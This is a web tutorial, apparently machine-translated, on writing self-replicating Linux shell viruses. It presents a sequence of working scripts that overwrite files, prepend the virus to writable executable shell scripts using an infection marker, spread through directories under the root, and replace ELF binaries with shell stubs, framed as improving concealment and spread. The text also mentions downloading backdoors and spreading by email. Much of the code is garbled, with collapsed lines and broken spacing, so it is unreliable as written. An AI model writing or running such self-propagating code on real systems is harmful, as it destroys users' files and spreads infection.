Introduction to virus-infected Linux script programs

Main Shell virus technologies
Of course, this article requires you to understand at least the basic knowledge of Linux Shell programming and the virus knowledge of the star node. OK! Let's get started!
Let's take a look at the most primitive shell virus. The code can best illustrate the problem:

#shellvirus I for file in * do cp $0 $file done

Simple? Traverse all files in the current file system and overwrite all files. However, we know that linux is a multi-user operating system, and its files are protected. Therefore, the above Scripts may report a lot of errors, so it will soon be detected by the Administrator and stop its transmission. Therefore, we can make a judgment for the script, so that the concealment is greatly enhanced:

#shellvirus II for file in * do if test -f $file then if test -x $file then if test -w $file then if grep -s echo $file >.mmm then cp $0 $file fi; fi; fi; fi; fi done rm .mmm -f

OK. we improved a bit and added several judgments to determine whether the file exists, whether the file is executable, and whether we have the permission to write, then determine whether it is a script program. If it is a cp $0 $ file, this code feels that all the script programs in the system are harmful.

if grep -s echo $file>/.mmm

This statement can also be written as follows:
If file $ file | grep-s 'Bourne shell script'>/dev/nul; then: determines whether the file is a shell script program. However, once the script virus is infected, nothing will be done. It is not as harmful as the binary virus, and the above script is just a simple overwrite of the host, so I used the traditional binary virus infection mechanism here, and the effect is also good :), look at the following code:

# Infection head-n 24 $0>. test <-save it. test for file in * <-traverse the file system do if test-f $ file <-determine whether the file is then if test-x $ file <-determine whether the file can be executed then if test -w $ file <-determine whether the file can be written to then if grep-s echo $ file>. mmm <-determine whether the script program is then head-n 1 $ file>. mm <-extract the first line of the script program to be infected if grep-s infection. mm>. mmm <-determine whether the file has been infected with then rm-f. mm <-infected, THEN else IS skipped <-cat $ file not infected yet>. SAVEE <-familiar with it? Uses the traditional binary file infection mechanism cat. test> $ file cat. SAVEE> $ file fi; fi done rm. test. SAVEE. mmm. mm-f

The program annotation is enough to explain that it actually increases the potential hazard, but it is still very easy to be found, there is no way to do things, shell scripts are generally plain text, huh, huh. However, it is quite harmful. This program uses an infection sign: infection to determine whether it has been infected and can be reflected in the program.
OK. In order to make the above Code not easy to discover, I must optimize it. The first consideration must be refined code:

#infection for file in * ;do if test -f $file && test -x $file && test -w $file ; then if grep -s echo $file > /dev/nul ; then head -n 1 $file >.mm if grep -s infection .mm > /dev/nul ; then rm .mm -f ; else cat $file > .SAVEE head -n 13 $0 > $file cat .SAVEE >> $file fi; fi; fi done rm .SAVEE .mm -f

Now only two temporary files are generated, and the code is reduced to 13 lines. Of course, it can be fully used; to write the code or even 1-2 lines, but here I just want to explain the problem.
No.
Well, let's see what other useful things the shell virus can do. It is possible that we want to infect files in other directories, such as the root directory or/etc,/bin, because most
Some useful system configuration scripts are stored in those directories. You only need to make slight changes to the above Code :)

# Infection xtemp = $ pwd <-Save the current path head-n 22 $0> /. test for dir in/*; do <-traverse/directory if test-d $ dir; then <-if it is a directory, cd this directory cd $ dir for file in *; do <-traverse the directory file if test-f $ file & test-x $ file & test-w $ file; then <-determine whether the file is executable, if grep-s echo $ file>/dev/nul; then <-determine whether it is the script program head-n 1 $ file>. mm if grep-s infection. mm>/dev/nul; then <-confirm whether rm has been infected. mm-f; else cat $ file> /. SAVEE <-same as the previous infection mechanism, it is infected with the uninfected script program cat /. test> $ file cat /. SAVEE> $ file fi; fi done cd .. fi done cd $ xtemp <-returns the original directory rm /. test /. SAVEE. mm-f

In fact, this code only infected a directory under the/directory. Of course we can make it more infected, just add a few loops. Similarly, shell viruses can do a lot of things.
For example, download the backdoor program to automatically open a backdoor for the machine, take the initiative to attack other machines connected to the Internet, take the user's email to send the infection, etc. In short, its implementation technology is not advanced,
But it is also more practical and worth explaining.
Similarly, we can also infect the elf file, but it is very harmful. Here we will not focus on it. Let's take a look at this routine.

for file in * ;do if test -f $file && test -x $file && test -w $file ; then if file $file | grep -s 'ELF' > /dev/nul ; then mv $file .$file head -n 9 $0 > $file fi; fi done .$0

Related Articles]

• Linux Shell Virus

• Introduction to regular expression syntax in UNIX and Linux Shell

• Performance Optimization Techniques for a Linux Shell Program